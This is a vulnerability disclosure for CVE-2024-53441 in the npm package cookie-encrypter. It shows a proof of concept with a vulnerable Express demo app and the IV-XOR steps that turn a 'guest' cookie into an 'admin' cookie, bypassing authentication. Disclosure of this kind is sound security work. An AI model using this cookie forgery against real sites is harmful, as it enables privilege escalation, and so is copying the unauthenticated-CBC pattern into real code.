# CVE-2024-53441

## Description:

An issue in the `index.js` `decryptCookie` function of cookie-encrypter v1.0.1 allows attackers to execute a bit-flipping attack against encrypted cookies.

| Field                      | Details                                                |
|----------------------------|--------------------------------------------------------|
| Vulnerability type         | Auth bypass using cookie                               |
| Vendor of Product          | NPM                                                    |
| Affected Product Code Base | https://www.npmjs.com/package/cookie-encrypter - 1.0.1 |
| Affected Component         | index.js decryptCookie function                        |
| Attack Type                | Remote                                                 |
| Impact                     | Escalation of Privileges                               |
| Discoverer                 | Mathys REBOUX                                          |

## Attack Vectors:

To exploit the vulnerability, an attacker takes a valid encrypted cookie and modifies it with a bit-flipping attack. The library encrypts with AES in CBC mode and does not authenticate the ciphertext, so nothing detects the modification. In CBC decryption the first plaintext block is `P1 = D_K(C1) XOR IV`, so any XOR mask applied to the IV (the first part of the cookie) is applied unchanged to the first 16 bytes of the decrypted cookie. The attacker does not need the key, only the current plaintext value of the cookie and the value they want it to become.

## Demo of the attack:

Let's imagine a website with the following source code:

```js
const express = require('express');
const cookieParser = require('cookie-parser');
const cookieEncrypter = require('cookie-encrypter');
const app = express();

// The same 32-byte secret is used for cookie-parser and cookie-encrypter (AES-256).
app.use(cookieParser("NicePasswordHereItIsAGoodSecret!"));
app.use(cookieEncrypter("NicePasswordHereItIsAGoodSecret!"));

// Issues an encrypted cookie whose plaintext is "guest".
app.get('/login', function(req, res) {
  res.cookie("role", "guest");
  res.send("logged in as guest");
});

// Trusts the decrypted cookie value as the user's role.
app.get("/admin", (req, res) => {
  console.log(req.cookies);
  if (req.cookies.role == "admin") {
    res.send("Access granted.");
  } else {
    res.send("Access denied.");
  }
});

app.listen(80);
```

We load `/login` and get a cookie as guest (format `e:<IV hex>:<ciphertext hex>`):

```
e:87c3aa62cf38214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1
```

We now have to XOR the IV:

```
87c3aa62cf38214f7c25d66eacb4c95a
```

We XOR it by `guest` and then by `admin`, each padded with zero bytes to 16 bytes so that only the first five bytes of the IV change (the remaining bytes, which hold the PKCS#7 padding after decryption, are left intact). [Here is a link to help](https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')XOR(%7B'option':'Hex','string':'67756573740000000000000000000000'%7D,'Standard',false)XOR(%7B'option':'Hex','string':'61646d696e0000000000000000000000'%7D,'Standard',false)To_Hex('None',0)&input=ODdjM2FhNjJjZjM4MjE0ZjdjMjVkNjZlYWNiNGM5NWE)

So we get the following crafted cookie:

```
e:81d2a278d538214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1
```

And now loading `/admin` we get: `Access granted.`

## Discoverer: Mathys REBOUX